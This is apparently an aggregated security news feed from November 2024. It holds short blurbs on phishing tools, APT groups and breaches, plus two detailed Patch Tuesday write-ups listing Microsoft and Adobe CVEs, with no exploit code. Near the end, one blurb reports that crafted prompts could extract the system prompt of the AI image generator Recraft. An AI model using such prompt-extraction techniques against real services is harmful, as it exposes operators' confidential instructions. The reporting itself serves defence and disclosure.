by The Hacker News

Cybersecurity researchers are calling attention to a new sophisticated tool called GoIssue that can be used to send phishing messages at scale targeting GitHub users. The program, first marketed by a threat actor named cyberdluffy (aka Cyber D'' Luffy) on the Runion forum earlier this August, is advertised as a tool that allows criminal actors to extract email addresses from public GitHub

by The Hacker News

With scam cases still climbing despite multiple safeguards, the proposed bill aims to restrict certain victims from making online banking transactions.

by ZDNET Security

As Black Friday approaches, you can take advantage of NordVPN''s latest promotion: a discounted plan with free months of service thrown in to sweeten the deal.

by ZDNET Security

Threat actors with ties to the Democratic People''s Republic of Korea (DPRK aka North Korea) have been found embedding malware within Flutter applications, marking the first time this tactic has been adopted by the adversary to infect Apple macOS devices. Jamf Threat Labs, which made the discovery based on artifacts uploaded to the VirusTotal platform earlier this month, said the Flutter-built

by The Hacker News

It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts.If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for November 2024For November, Adobe released eight patches addressing 48 CVEs in Adobe Bridge, Audition, After Effects, Substance 3D Painter, Illustrator, InDesign, Photoshop, and Commerce. The largest of these fixes is for Substance 3D Painter with 22 Critical and Important CVEs. The next largest is the patch for Illustrator, with nine CVEs addressed. The fix for After Effects addresses six bugs – three Critical and three Important. The worst of these could allow arbitrary code execution. That’s the same story for the InDesign patch. There’s a single server-side request forgery (SSRF) in Commerce, but it requires authentication. There’s also a single, Critical-rated CVE in Photoshop, which requires user interaction in the form of opening a file. The remaining fixes from Adobe are only Important rated, with two bugs in Adobe Bridge and a single bug in Adobe Audition.None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.Microsoft Patches for November 2024This month, Microsoft released 89 new CVEs in Windows and Windows Components; Office and Office Components; Azure; .NET and Visual Studio; LightGBM; Exchange Server; SQL Server; TorchGeo; Hyper-V; and Windows VMSwitch. One of these vulnerabilities was reported through the ZDI program. With the addition of the third-party CVEs, the entire release tops out at 92 CVEs.Of the patches released today, four are rated Critical, 84 are rated Important, and one is rated Moderate in severity. This represents another large month of fixes from the Redmond giant and puts them at 949 CVEs addressed so far this year. Even before counting the fixes in December, 2024 is Microsoft''s second-largest year for fixes. Microsoft lists three of these CVEs as publicly known, but I disagree and put the count at five (more on that later). They also list two as being exploited in the wild at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerabilities currently under active attack:CVE-2024-43451 - NTLM Hash Disclosure Spoofing VulnerabilityIt seems we can never fully escape Internet Explorer. Despite it being retired by Microsoft, it still remains in the form of MSHTML and is accessible through the WebBrowser control and other means. That is what is being abused by attackers here to disclose the victim’s NTLMv2 hash, which could then be used by the attacker to authenticate as the user. User interaction is required, but that doesn’t seem to stop these attacks from being effective. As always, Microsoft does not give any indication of how widespread these attacks are, but I would not wait to test and deploy this update. CVE-2024-49039 - Windows Task Scheduler Elevation of Privilege VulnerabilityHere’s another local privilege escalation bug being used in the wild. However, this isn’t the straightforward EoP we typically see. In this case, the bug allows an AppContainer escape – allowing a low-privileged user to execute code at Medium integrity. You still need to be able to execute code on the system for this to occur, but container escapes are still quite interesting as they are rarely seen in the wild. This was reported by multiple researchers, which indicates the bug is being exploited in multiple regions. Hopefully one of the researchers will provide additional details about the vulnerability now that a fix is available. CVE-2024-43639 - Windows Kerberos Remote Code Execution VulnerabilityI don’t often get excited about bugs (ok – that’s a lie – I totally do), but this CVSS 9.8 bug excites me. The vulnerability allows a remote, unauthenticated attacker to run code on an affected system by leveraging a bug in the cryptographic protocol. No user interaction is required. Since Kerberos runs with elevated privileges, that makes this a wormable bug between affected systems. What systems are impacted? Every supported version of Windows Server. I somehow doubt this will actually be seen in the wild, but I wouldn’t take that chance. Test and deploy this fix quickly.CVE-2024-43498 - .NET and Visual Studio Remote Code Execution VulnerabilityThis is one of the bugs I say is public even though Microsoft doesn’t, as it sure looks like this issue. This is another CVSS 9.8 and would allow attackers to execute code by sending a specially crafted request to an affected .NET webapp. The attacker could also convince a target to load a specially crafted file from an affected desktop app. Either way, the resulting code execution would occur at the level of the application, so it may be paired with an EoP if it were to be seen in the wild. Definitely check your .NET and Visual Studio apps and patch them as needed.Here’s the full list of CVEs released by Microsoft for November 2024: CVE Title Severity CVSS Public Exploited Type CVE-2024-43451 NTLM Hash Disclosure Spoofing Vulnerability Important 6.5 Yes Yes Spoofing CVE-2024-49039 Windows Task Scheduler Elevation of Privilege Vulnerability Important 8.8 No Yes EoP CVE-2024-43498 .NET and Visual Studio Remote Code Execution Vulnerability Critical 9.8 Yes ** No RCE CVE-2024-5535 * OpenSSL: CVE-2024-5535 SSL_select_next_proto buffer overread Important 9.1 Yes** No RCE CVE-2024-49019 Active Directory Certificate Services Elevation of Privilege Vulnerability Important 7.8 Yes No EoP CVE-2024-49040 † Microsoft Exchange Server Spoofing Vulnerability Important 7.5 Yes No Spoofing CVE-2024-49056 Airlift.microsoft.com Elevation of Privilege Vulnerability Critical 7.3 No No EoP CVE-2024-43625 Microsoft Windows VMSwitch Elevation of Privilege Vulnerability Critical 8.1 No No EoP CVE-2024-43639 Windows Kerberos Remote Code Execution Vulnerability Critical 9.8 No No RCE CVE-2024-43499 .NET and Visual Studio Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-43602 Azure CycleCloud Remote Code Execution Vulnerability Important 9.9 No No RCE CVE-2024-43613 Azure Database for PostgreSQL Flexible Server Extension Elevation of Privilege Vulnerability Important 7.2 No No EoP CVE-2024-49042 Azure Database for PostgreSQL Flexible Server Extension Elevation of Privilege Vulnerability Important 7.2 No No EoP CVE-2024-43598 LightGBM Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2024-49026 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49027 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49028 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49029 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49030 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49031 Microsoft Office Graphics Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49032 Microsoft Office Graphics Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-49051 Microsoft PC Manager Elevation of Privilege Vulnerability Important 8.4 No No EoP CVE-2024-49021 Microsoft SQL Server Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-38264 Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability Important 5.9 No No DoS CVE-2024-49033 Microsoft Word Security Feature Bypass Vulnerability Important 7.5 No No SFB CVE-2024-49043 † Microsoft.SqlServer.XEvent.Configuration.dll Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2024-38255 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43459 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43462 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48993 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48994 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48995 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48996 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48997 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48998 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-48999 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49000 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49001 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49002 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49003 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49004 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49005 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49006 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49007 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49008 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49009 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49010 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49011 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49012 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49013 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49014 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49015 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49016 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49017 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49018 SQL Server Native Client Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49048 TorchGeo Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2024-49050 Visual Studio Code Python Extension Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-49044 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2024-43636 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43644 Windows Client-Side Caching Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43645 Windows Defender Application Control (WDAC) Security Feature Bypass Vulnerability Important 6.7 No No SFB CVE-2024-43450 Windows DNS Spoofing Vulnerability Important 7.5 No No Spoofing CVE-2024-43629 Windows DWM Core Library Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43633 Windows Hyper-V Denial of Service Vulnerability Important 6.5 No No DoS CVE-2024-43624 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability Important 8.8 No No EoP CVE-2024-43630 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43640 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43623 Windows NT OS Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-38203 Windows Package Library Manager Information Disclosure Vulnerability Important 6.2 No No Info CVE-2024-43641 Windows Registry Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43452 Windows Registry Elevation of Privilege Vulnerability Important 7.5 No No EoP CVE-2024-43631 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2024-43646 Windows Secure Kernel Mode Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2024-43642 Windows SMB Denial of Service Vulnerability Important 7.5 No No DoS CVE-2024-43447 Windows SMBv3 Server Remote Code Execution Vulnerability Important 8.1 No No RCE CVE-2024-43626 Windows Telephony Service Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43620 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43621 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43622 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43627 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43628 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43635 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2024-43530 Windows Update Stack Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-43449 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43634 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43637 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43638 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-43643 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.8 No No EoP CVE-2024-49046 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2024-49049 Visual Studio Code Remote Extension Elevation of Privilege Vulnerability Moderate 7.1 No No EoP CVE-2024-10826 * Chromium: CVE-2024-10826 Use after free in Family Experiences High N/A No No RCE CVE-2024-10827 * Chromium: CVE-2024-10827 Use after free in Serial High N/A No No RCE * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.** Indicates this bug is not listed as public by Microsoft but considered to be public for the purposes of this blog.† Indicates further administrative actions are required to fully address the vulnerability.There are only two other Critical-rated bugs receiving fixes this month, and both involve privilege escalations. The bug in VMSwitch could allow a low-privileged user on a guest OS to execute their code at SYSTEM on the underlying host OS. That’s officially a Bad Thing™. The other Critical-rated bug resides in a cloud service, so the vulnerability has already been mitigated and is now being documented.There are more than 50 other code execution bugs this month, but most of these impact SQL Server. These require an affected system to connect to a malicious SQL database, so the likelihood of exploitation is pretty low. There is one SQL bug that requires additional attention. CVE-2024-49043 requires an update to OLE DB Driver 18 or 19, but may also require third-party fixes, too. Ensure you read that one carefully and apply all the needed fixes. There are also quite a few open-and-own bugs in Office components, but none involve the Preview Pane. There are a half-dozen RCE bugs in the Telephony service. These all require the target to connect to a malicious server, but this could be done by tricking the user into sending a request to the attacker-controlled server. Of the more interesting RCE bugs, the SMBv3 bug stands out. An attacker could exploit this by using a malicious SMB client to mount an attack against an affected SMB server. Interestingly, this is only applicable to SMB over QUIC, which might not be a common setup. Another interesting bug is a CVSS 9.9 vulnerability in the Azure CycleCloud. This does require basic permissions but could be used to gain root-level permissions and allow them to execute commands on any Azure CycleCloud cluster in the current instance. Neat. There’s an RCE in TouchGeo, which is a PyTorch domain library for use with machine learning. There’s no real information about the vulnerability, but it can be hit remotely and doesn’t require user interaction. Finally, there’s the Microsoft update for OpenSSL. They do not list this as public, but this bug was documented back in June. Even though this is a third-party update, I find not listing this as public is disingenuous.There are more than two dozen fixes for privilege escalation bugs in this release. However, most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. However, there are a few that stand out. The bugs in the USB Video Class System require physical access as the attacker needs to plug in a USB device. This would also lead to SYSTEM-level code execution. The escalation in Active Directory Certificates would allow an attacker to gain administrative privileges, but only if your PKI environment is set to specific parameters, so read the bulletin for details. The bugs in Azure Database for PostgreSQL could lead to the same privileges as the SuperUser role. The bug in PC Manager allows attackers to delete files, which can be used to elevate privileges. The Visual Studio bug just gets to the privileges of the current user. Finally, the bug in Hyper-V could allow a guest-to-host code execution at SYSTEM on the host OS. Microsoft lists this as a CVSS 8.8, but considering this could be viewed as a scope change (going from guest OS to SYSTEM), I would rate it at a 9.9.There are only two Security Feature Bypass (SFB) bugs in the November release. The bug in Word could allow attackers to bypass Office Protected View. Not surprisingly, the bypass in the Windows Defender Application Control (WDAC) allows attackers to bypass WDAC enforcement and run unauthorized apps.There’s only a single information disclosure bug getting fixed this month, and it resides in the Windows Package Library Manager. It allows attackers to expose privileged information belonging to the user of the affected application.There are a couple of spoofing bugs being addressed, and the first is in Exchange Server. Microsoft doesn’t list what is being spoofed, but with Exchange Server, this often leads to NTLM relays. And you’ll need to do more than patch this bug. You need to take the additional actions listed here to be fully protected, which is just what every Exchange admin wants to hear. The other spoofing bug is in DNS. Again, no real information is given by Microsoft, but DNS spoofing bugs typically lead to altered DNS responses.The November release is rounded out by four denial-of-service (DoS) bugs. As usual, Microsoft provides next to no information about these bugs or their impact. The only exception to this is the DoS bug in Hyper-V, which could be used to execute a cross-VM attack – allowing one guest VM to impact other guest VMs on the same hypervisor.There are no new advisories in this month’s release.Looking AheadThe final Patch Tuesday of 2024 will be on December 10, and I’ll return with details and patch analysis at that time. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

by Zero Day Initiative Blog

Marketed on a cybercriminal forum, the $700 tool harvests email addresses from public GitHub profiles, priming cyberattackers for further credential theft, malware delivery, OAuth subversion, supply chain attacks, and other corporate breaches.

by Dark Reading

Key findings: Introduction WIRTE is a Middle Eastern Advanced Persistent Threat (APT) group active since at least 2018. The group is primarily known for engaging in politically motivated cyber-espionage, focusing on intelligence gathering likely linked to regional geopolitical conflicts. WIRTE is believed to be a subgroup connected to Gaza Cybergang, a cluster affiliated with Hamas. Since late 2023, Check […] The post Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity appeared first on Check Point Research.

by Check Point Research

by ComputerWeekly

The U.S. Department of justice indicted two hackers for breaking into the systems of AT&T and several other companies. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

There is some disagreement over whether the remote code execution (RCE) security flaws allow for unauthenticated exploitation or not. Citrix says no, but researchers say the company is downplaying a "good old unauthenticated RCE."

by Dark Reading

Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more

by The Hacker News

2024 is coming to a close, and it’s as good a time as any to reflect on the year we’ve had in cybersecurity. It hasn’t been the easiest ride – just earlier this year, the Department for Science, Innovation and Technology reported that a staggering half of businesses had experienced some form of cybersecurity breach […] The post Expert Insight: The digital pandemic: How cyber threats are threatening life as we know it appeared first on IT Security Guru.

by IT Security Guru

The Discord leaks rocked the U.S. national security establishment, revealing the speed with which top-secret materials can spread online.

by ITPro Today

Learn how lateral movement attacks pose serious risks in on-prem, cloud, or hybrid environments, and discover effective strategies to mitigate these threats.

by Mitiga

50 billion call and text records were stolen from one victim, U.S. says.

by ITPro Today

Learn about the Log4j vulnerability, including resources, updates, and mitigation steps to protect your systems.

by Mitiga

Learn how to investigate the CircleCI breach with Mitiga’s technical guide to assist organizational threat hunting efforts.

by Mitiga

Microsoft tightened its already strict hardware compatibility requirements for Windows 11 upgrades again. The updated Rufus utility can bypass those restrictions for most PCs, but it''s the end of the line for an unlucky few.

by ZDNET Security

Attackers abuse concatenation, a method that involves appending multiple zip archives into a single file, to deliver a variant of the SmokeLoader Trojan hidden in malicious attachments delivered via phishing.

by ITPro Today

AttackIQ has released a new attack graph that seeks to emulate the Tactics, Techniques and Procedures (TTPs) associated with the destructive WhisperGate malware. The post Emulating the Destructive WhisperGate Malware appeared first on AttackIQ.

by AttackIQ

The security vulnerability is due to an exposed Microsoft Message Queuing (MSMQ) instance and the use of the insecure BinaryFormatter.

by Dark Reading

CISA should make its recommended goals mandatory and perform audits to ensure compliance.

by Dark Reading

Bitdefender offers feature-rich antivirus at a competitive price, while Malwarebytes focuses on protection against malware. Here''s how to decide between the two.

by ZDNET Security

The cybersecurity landscape is sadly brimming with tools that address narrow, specific problems, leading to a phenomenon known as “Point... The post Why Falco works the best in distributed architectures appeared first on Sysdig.

by Sysdig

Explore strategic decisions on changing pentesting companies. Balance risk, compliance, and security goals with an effective pentesting partner. The post Why Changing Pentesting Companies Could Be Your Best Move appeared first on NetSPI.

by NetSPI

4Critical82Important1Moderate0LowMicrosoft addresses 87 CVEs and one advisory (ADV240001) in its November 2024 Patch Tuesday release, with four critical vulnerabilities and four zero-day vulnerabilities, including two that were exploited in the wild.Microsoft patched 87 CVEs in its November 2024 Patch Tuesday release, with four rated critical, 82 rated important and one rated moderate.This month’s update includes patches for:.NET and Visual StudioAirlift.microsoft.comAzure CycleCloudAzure Database for PostgreSQLLightGBMMicrosoft Exchange ServerMicrosoft Graphics ComponentMicrosoft Office ExcelMicrosoft Office WordMicrosoft PC ManagerMicrosoft Virtual Hard DriveMicrosoft Windows DNSRole: Windows Hyper-VSQL ServerTorchGeoVisual StudioVisual Studio CodeWindows Active Directory Certificate ServicesWindows CSC ServiceWindows DWM Core LibraryWindows Defender Application Control (WDAC)Windows KerberosWindows KernelWindows NT OS KernelWindows NTLMWindows Package Library ManagerWindows RegistryWindows SMBWindows SMBv3 Client/ServerWindows Secure Kernel ModeWindows Task SchedulerWindows Telephony ServiceWindows USB Video DriverWindows Update StackWindows VMSwitchWindows Win32 Kernel SubsystemRemote code execution (RCE) vulnerabilities accounted for 58.6% of the vulnerabilities patched this month, followed by elevation of privilege (EoP) vulnerabilities at 29.9%.ImportantCVE-2024-43451 | NTLM Hash Disclosure Spoofing VulnerabilityCVE-2024-43451 is a NTLM hash spoofing vulnerability in Microsoft Windows. It was assigned a CVSSv3 score of 6.5 and is rated as important. An attacker could exploit this flaw by convincing a user to open a specially crafted file. Successful exploitation would lead to the unauthorized disclosure of a user’s NTLMv2 hash, which an attacker could then use to authenticate to the system as the user. According to Microsoft, CVE-2024-43451 was exploited in the wild as a zero-day. No further details about this vulnerability were available at the time this blog post was published.This is the second NTLM spoofing vulnerability disclosed in 2024. Microsoft patched CVE-2024-30081 in its July Patch Tuesday release.ImportantCVE-2024-49039 | Windows Task Scheduler Elevation of Privilege VulnerabilityCVE-2024-49039 is an EoP vulnerability in the Microsoft Windows Task Scheduler. It was assigned a CVSSv3 score of 8.8 and is rated as important. An attacker with local access to a vulnerable system could exploit this vulnerability by running a specially crafted application. Successful exploitation would allow an attacker to access resources that would otherwise be unavailable to them as well as execute code, such as remote procedure call (RPC) functions.According to Microsoft, CVE-2024-49039 was exploited in the wild as a zero-day. It was disclosed to Microsoft by an anonymous researcher along with Vlad Stolyarov and Bahare Sabouri of Google''s Threat Analysis Group. At the time this blog post was published, no further details about in-the-wild exploitation were available.ImportantCVE-2024-49019 | Active Directory Certificate Services Elevation of Privilege VulnerabilityCVE-2024-49019 is an EoP vulnerability affecting Active Directory Certificate Services. It was assigned a CVSSv3 score of 7.8 and is rated as important. It was publicly disclosed prior to a patch being made available. According to Microsoft, successful exploitation would allow an attacker to gain administrator privileges. The advisory notes that “certificates created using a version 1 certificate template with Source of subject name set to ‘Supplied in the request’” are potentially impacted if the template has not been secured according to best practices. This vulnerability is assessed as “Exploitation More Likely” according to Microsoft’s Exploitability Index. Microsoft’s advisory also includes several mitigation steps for securing certificate templates which we highly recommend reviewing.ImportantCVE-2024-49040 | Microsoft Exchange Server Spoofing VulnerabilityCVE-2024-49040 is a spoofing vulnerability affecting Microsoft Exchange Server 2016 and 2019. It was assigned a CVSSv3 score of 7.5 and rated as important. According to Microsoft, this vulnerability was publicly disclosed prior to a patch being made available. After applying the update, administrators should review the support article Exchange Server non-RFC compliant P2 FROM header detection. The supplemental guide notes that as part of a “secure by default” approach, the Exchange Server update for November will flag suspicious emails which may contain “malicious patterns in the P2 FROM header.” While this feature can be disabled, Microsoft strongly recommends leaving it enabled to provide further protection from phishing attempts and malicious emails.CriticalCVE-2024-43639 | Windows Kerberos Remote Code Execution VulnerabilityCVE-2024-43639 is a critical RCE vulnerability affecting Windows Kerberos, an authentication protocol designed to verify user or host identities. It was assigned a CVSSv3 score of 9.8 and is rated as “Exploitation Less Likely.”To exploit this vulnerability, an unauthenticated attacker needs to leverage a cryptographic protocol vulnerability in order to achieve RCE. No further details were provided by Microsoft about this vulnerability at the time this blog was published.Important29 CVEs | SQL Server Native Client Remote Code Execution VulnerabilityThis month''s release included 29 CVEs for RCEs affecting SQL Server Native Client. All of these CVEs received CVSSv3 scores of 8.8 and were rated as “Exploitation Less Likely.” Successful exploitation of these vulnerabilities can be achieved by convincing an authenticated user into connecting to a malicious SQL server database using an affected driver. A full list of the CVEs are included in the table below.CVEDescriptionCVSSv3CVE-2024-38255SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-43459SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-43462SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48993SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48994SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48995SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48996SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48997SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48998SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-48999SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49000SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49001SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49002SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49003SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49004SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49005SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49006SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49007SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49008SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49009SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49010SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49011SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49012SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49013SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49014SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49015SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49016SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49017SQL Server Native Client Remote Code Execution Vulnerability8.8CVE-2024-49018SQL Server Native Client Remote Code Execution Vulnerability8.8ImportantCVE-2024-43602 | Azure CycleCloud Remote Code Execution VulnerabilityCVE-2024-43602 is a RCE vulnerability in Microsoft’s Azure CycleCloud, a tool that helps in managing and orchestrating High Performance Computing (HPC) environments in Azure. This flaw received the highest CVSSv3 score of the month, a 9.9 and was rated as important. A user with basic permissions could exploit CVE-2024-43602 by sending specially crafted requests to a vulnerable AzureCloud CycleCloud cluster to modify its configuration. Successful exploitation would result in the user gaining root permissions, which could then be used to execute commands on any cluster in the Azure CycleCloud as well as steal admin credentials.Tenable SolutionsA list of all the plugins released for Microsoft’s November 2024 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.Get more informationMicrosoft''s November 2024 Security UpdatesTenable plugins for Microsoft November 2024 Patch Tuesday Security UpdatesJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

by KnowBe4

Today’s critical infrastructure organizations rely on operational technology (OT) to help control and manage the systems and processes required to keep critical services to the public running. However, due to the highly integrated nature of OT deployments, cybersecurity has become a primary concern. On October 2, 2024, the NSA (National Security Agency) released a new […] The post 6 Principles of Operational Technology Cybersecurity released by joint NSA initiative appeared first on Security Intelligence.

by Security Intelligence

Bitwarden offers secure, budget-friendly password management, while 1Password puts a premium on user experience. Here''s how to decide between the two.

by ZDNET Security

All about tools for archiving websites and searching web page archives.

by Kaspersky

Atlas Biomed, a DNA testing company that promised clients insights into their genetic disposition has suddenly disappeared.

by Malwarebytes Labs

Recraft''s image generation service could leak its internal system prompts due to its unique architecture combining Claude (an AI language model) with a diffusion model. Unlike other image generators, Recraft could perform calculations and answer questions, which led to the discovery that carefully crafted prompts could expose the system''s internal instructions. The post System prompt exposure: How AI image generators may leak sensitive instructions appeared first on Invicti.

by Invicti

Isn’t it typical for bad actors to strike when we’re distracted and busy during this time of year?

by KnowBe4

by ComputerWeekly